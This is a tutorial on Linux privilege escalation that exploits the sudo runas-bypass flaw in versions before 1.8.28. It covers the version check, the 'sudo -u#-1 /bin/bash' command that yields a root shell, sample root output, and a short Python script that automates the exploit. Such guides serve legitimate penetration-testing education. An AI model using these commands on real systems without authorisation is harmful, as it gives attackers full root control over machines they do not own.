Guides, Linux, Privilege Escalation

Linux Privilege Escalation – Vulnerable Sudo Version

May 2, 2021 | by Stefano Lanaro | Leave a comment

Introduction

Sudo is a program for Unix-like operating systems that allows users to run programs with the security privileges of another user, by default the superuser. It originally stood for “superuser do” as the older versions of Sudo were designed to run commands only as the superuser. It is commonly used in scenarios where normal users need to be able to perform actions as root.

Over the years, certain versions of Sudo were found to be affected by vulnerabilities that allowed attackers to escalate privileges to root, this guide will demonstrate how to identify a vulnerable Sudo version and how to exploit it in order to perform privilege escalation.

Identifying Vulnerable Sudo Version

The following command can be used in Unix-like operating systems to identify the running version of Sudo :

sudo -V | grep "Sudo ver"

The output above shows how the current Sudo version is 1.8.25p1. By doing a quick search using SearchSploit, it appears the current version of Sudo may be vulnerable:

Specifically, when looking at the exploit 47502 from ExploitDB, it appears that this vulnerability allows to bypass Sudo rules that have been setup with the “!” symbol, to specify that a user should not be able to run a certain command as root (or any other user). The syntax of Sudo rules is as follows:

  • The user the rule applies to
  • The user/group the command can be executed as
  • The allowed command(s)

For example:

john (jack, jack) cp

The above willl mean that the john user can execute the “cp” command as the jack user/group

Through this exploit, the rule can be bypassed by issuing the following command:

sudo -u#-1 [command to execute]

This exploit is possible because this version of Sudo doesn’t validate if the user ID specified using the -u flag actually exists and it executes the command using an arbitrary user id with root privileges, and since -u#-1 returns 0, which is the user id of the root user, commands are therefore executed as root.

The full explanation from ExploitDB is available below:

User hacker may run the following commands on kali:
    (ALL, !root) /bin/bash

So user hacker can't run /bin/bash as root (!root)

EXPLOIT: 

sudo -u#-1 /bin/bash

Example : 

hacker@kali:~$ sudo -u#-1 /bin/bash
root@kali:/home/hacker# id
uid=0(root) gid=1000(hacker) groups=1000(hacker)
root@kali:/home/hacker#

Description :
Sudo doesn't check for the existence of the specified user id and executes the with arbitrary user id with the sudo priv
-u#-1 returns as 0 which is root's id

and /bin/bash is executed with root permission

This exploit seems to affect versions of Sudo prior to 1.8.28, even though the exploit name only mentions Sudo version 1.8.27 being vulnerable.

When executing the following command as the “hugo” user, it appears this user can execute /bin/bash as all users other than root:

sudo -l

This could be exploited as the “!” symbol is used to specify what users /bin/bash can be executed as.

Exploiting Vulnerable Sudo Version

When executing the following command, the “hugo” user is able to execute /bin/bash as root, and therefore gain an elevated shell:

sudo -u#-1 /bin/bash

Like in this case, these exploits will often include automated scripts that will exploit the vulnerability without the need to perform the above checks, although it is always best to perform these types of tasks manually to better understand what the exploit does and to prevent issues occurring from running unknown code. The Python script below can be used to automate this particular exploit:

#!/usr/bin/python3
import os

#Get current username
username = input("Enter current username :")

#check which binary the user can run with sudo
os.system("sudo -l > priv")

os.system("cat priv | grep 'ALL' | cut -d ')' -f 2 > binary")

binary_file = open("binary")
binary= binary_file.read()

#execute sudo exploit
print("Lets hope it works")
os.system("sudo -u#-1 "+ binary)

The script simply runs sudo -l, identifies whether the current user is allowed to execute commands as root, and then executes such commands using the syntax shown in the previous steps.

Conclusion

Like a lot of Unix administrative tools, Sudo can be very powerful and can greatly help users perform day-to-day operations, although if affected by a vulnerability like the one seen above it could be very dangerous and result in a full system compromise.